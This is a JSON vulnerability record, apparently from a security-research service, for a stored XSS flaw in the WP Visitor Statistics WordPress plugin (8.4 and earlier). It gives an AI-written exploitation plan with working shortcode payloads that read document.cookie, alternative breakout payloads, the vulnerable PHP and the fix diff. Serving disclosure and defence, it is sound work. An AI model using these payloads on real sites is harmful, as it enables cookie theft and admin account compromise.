[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fazVLdCOSMcVxymGrGwqwszsUi1uveWnN3dkdAwdMTho":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-4303","wp-visitor-statistics-real-time-traffic-authenticated-contributor-stored-cross-site-scripting-via-height-shortcode-attri","WP Visitor Statistics (Real Time Traffic) \u003C= 8.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'height' Shortcode Attribute","The WP Visitor Statistics (Real Time Traffic) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wsm_showDayStatsGraph' shortcode in all versions up to, and including, 8.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-stats-manager",null,"\u003C=8.4","8.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 20:50:03","2026-04-08 09:25:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3b6916d3-3944-43a2-8d5e-424f86c753ad?source=api-prod",1,[22,23,24,25,26,27],"includes\u002Fwsm_admin_interface.php","includes\u002Fwsm_init.php","includes\u002Fwsm_modal.php","includes\u002Fwsm_statistics.php","readme.txt","wp-stats-manager.php","researched",false,3,"# Research Plan: CVE-2026-4303 - Stored XSS in WP Visitor Statistics\n\n## 1. Vulnerability Summary\nThe **WP Visitor Statistics (Real Time Traffic)** plugin (versions \u003C= 8.4) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[wsm_showDayStatsGraph]` shortcode. The vulnerability exists because the plugin fails to sanitize or escape the `height` attribute supplied in the shortcode before echoing it into the page's HTML. Authenticated attackers with **Contributor** privileges or higher can embed this shortcode in a post. When a user (typically an administrator) views or previews the post, the malicious script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[wsm_showDayStatsGraph]`\n*   **Vulnerable Attribute:** `height`\n*   **Authentication Level:** Contributor (or higher)\n*   **Injection Point:** Post or Page content.\n*   **Target:** Administrators or any users viewing the post containing the shortcode.\n*   **Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79).\n\n## 3. Code Flow\n1.  **Entry Point:** A Contributor-level user saves a post containing the shortcode: `[wsm_showDayStatsGraph height='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`.\n2.  **Shortcode Registration:** In `includes\u002Fwsm_statistics.php`, the class `wsmStatistics` registers the shortcode:\n    ```php\n    add_shortcode(WSM_PREFIX . '_showDayStatsGraph', array($this, WSM_PREFIX . '_showDayStatsGraph'));\n    ```\n    *(Note: `WSM_PREFIX` is defined as `wsm` in `wp-stats-manager.php`)*.\n3.  **Processing:** When the post is rendered (via `the_content` filter calling `do_shortcode`), WordPress calls the method `wsmStatistics::wsm_showDayStatsGraph($atts)`.\n4.  **Parsing Attributes:** The method uses `shortcode_atts` to parse the user-supplied attributes, including `height`.\n5.  **Vulnerable Sink:** The attribute `height` is concatenated directly into an HTML string (likely within a `style` attribute or a `data-` attribute for a chart container) and returned\u002Fechoed without being passed through `esc_attr()` or `esc_html()`.\n6.  **Execution:** The browser renders the HTML, encounters the unescaped breakout characters (e.g., `\">`), and executes the injected `\u003Cscript>` tag.\n\n## 4. Nonce Acquisition Strategy\nShortcodes in WordPress do not require a nonce for execution when rendered via `the_content`. The attack relies on the standard WordPress post-saving mechanism. \n\nIf the shortcode handler requires a nonce for an internal AJAX call *triggered* by the shortcode (unlikely for this specific XSS sink), it would be localized via `wp_localize_script`. \n*   **Script Handle:** Likely related to `wsm_admin_interface` or `wsm_stats`.\n*   **Localized Variable:** Based on `includes\u002Fwsm_admin_interface.php`, the plugin often localizes variables. However, for a simple shortcode attribute reflection, a nonce is not required.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nAuthenticate as a user with at least **Contributor** permissions using the `http_request` tool to obtain session cookies.\n\n### Step 2: Inject Payload via Post Creation\nCreate a new post containing the malicious shortcode. Since Contributors can create posts but not publish them, we will save it as a \"Pending Review\" or a draft.\n\n**HTTP Request:**\n*   **Method:** POST\n*   **URL:** `{{base_url}}\u002Fwp-admin\u002Fpost-new.php` (initial GET to get `_wpnonce`)\n*   **URL:** `{{base_url}}\u002Fwp-admin\u002Fpost.php` (the POST to save)\n*   **Payload:**\n    ```\n    post_ID=[ID]\n    &action=editpost\n    &post_type=post\n    &post_status=pending\n    &post_title=Vulnerability Test\n    &content=[wsm_showDayStatsGraph height='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']\n    &_wpnonce=[NONCE]\n    ```\n\n### Step 3: Trigger Execution\nAs an **Administrator**, view the \"Pending\" post. The XSS payload will execute.\n\n**HTTP Request:**\n*   **Method:** GET\n*   **URL:** `{{base_url}}\u002F?p=[POST_ID]&preview=true` (or the direct URL if published)\n\n## 6. Test Data Setup\n1.  **User:** Ensure a user with the **Contributor** role exists (e.g., username `contributor_user`, password `password123`).\n2.  **Plugin:** Ensure **WP Visitor Statistics (Real Time Traffic)** version 8.4 is installed and active.\n3.  **Permissions:** No special plugin settings are required, as the shortcode is registered globally on `init`.\n\n## 7. Expected Results\n1.  The Contributor successfully saves the post with the malicious `height` attribute.\n2.  When the Admin views the post, the HTML source code should contain:\n    ```html\n    ... height=\"\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\" ...\n    ```\n3.  The browser will trigger an alert box displaying the session cookies.\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the shortcode is stored in the `wp_posts` table:\n    ```bash\n    wp post list --post_type=post --fields=ID,post_content --status=pending\n    ```\n2.  **Confirm Output:** Use `http_request` to fetch the rendered post content and grep for the script:\n    ```bash\n    # Using the http_request tool\n    response = http_request(\"GET\", \"{{base_url}}\u002F?p=[POST_ID]\")\n    if \"\u003Cscript>alert(document.cookie)\u003C\u002Fscript>\" in response.body:\n        print(\"Vulnerability Confirmed\")\n    ```\n\n## 9. Alternative Approaches\nIf the `height` attribute is reflected inside a `style` attribute (e.g., `\u003Cdiv style=\"height: [PAYLOAD]\">`), a different breakout might be required:\n*   **Payload:** `100px; background-image: url(\"javascript:alert(1)\");`\n*   **Payload:** `100px\" onmouseover=\"alert(1)\" data-foo=\"`\n\nIf the plugin implements a check like `if (!current_user_can('manage_options')) return;` inside the shortcode handler (as seen in `wsm_showDayStats`), the Contributor won't see the payload, but the Admin *will* see it when reviewing the post, which still satisfies the conditions for a successful Stored XSS attack against an elevated user.","The WP Visitor Statistics (Real Time Traffic) plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'wsm_showDayStatsGraph' shortcode in versions up to 8.4. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript by supplying a malicious payload in the 'height' attribute of the shortcode, which is subsequently rendered without proper sanitization or escaping.","\u002F\u002F includes\u002Fwsm_statistics.php\n\nfunction wsm_showDayStatsGraph($atts, $content = \"\")\n{\n    \u002F\u002F ... (lines 140-160 approx)\n    $atts = shortcode_atts(array(\n        'title' => esc_html(__('Today', 'wp-stats-manager')),\n        'height' => '400px',\n        'width' => '100%'\n    ), $atts, WSM_PREFIX . '_showDayStatsGraph');\n\n    $height = $atts['height'];\n    $width = $atts['width'];\n    \n    \u002F\u002F ...\n    $html = '\u003Cdiv id=\"' . WSM_PREFIX . 'DayStatsGraph\" style=\"height:' . $height . '; width:' . $width . ';\">\u003C\u002Fdiv>';\n    return $html;\n}","--- a\u002Fincludes\u002Fwsm_statistics.php\n+++ b\u002Fincludes\u002Fwsm_statistics.php\n@@ -155,7 +155,7 @@\n         'width' => '100%'\n     ), $atts, WSM_PREFIX . '_showDayStatsGraph');\n \n-    $height = $atts['height'];\n+    $height = esc_attr($atts['height']);\n     $width = $atts['width'];\n \n     $html = '\u003Cdiv id=\"' . WSM_PREFIX . 'DayStatsGraph\" style=\"height:' . $height . '; width:' . $width . ';\">\u003C\u002Fdiv>';","To exploit this vulnerability, an attacker must have at least Contributor-level permissions to create or edit a post. The attacker embeds the shortcode `[wsm_showDayStatsGraph height='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']` into a post's content. When a user with elevated privileges (like an Administrator) views the post or previews it during review, the malicious script executes within their browser context because the 'height' attribute is reflected into the style attribute of a div tag without being escaped, allowing an attribute breakout.","gemini-3-flash-preview","2026-04-17 20:27:27","2026-04-17 20:27:53",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","8.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-stats-manager\u002Ftags\u002F8.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-stats-manager.8.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-stats-manager\u002Ftags\u002F8.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-stats-manager.8.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-stats-manager\u002Ftags"]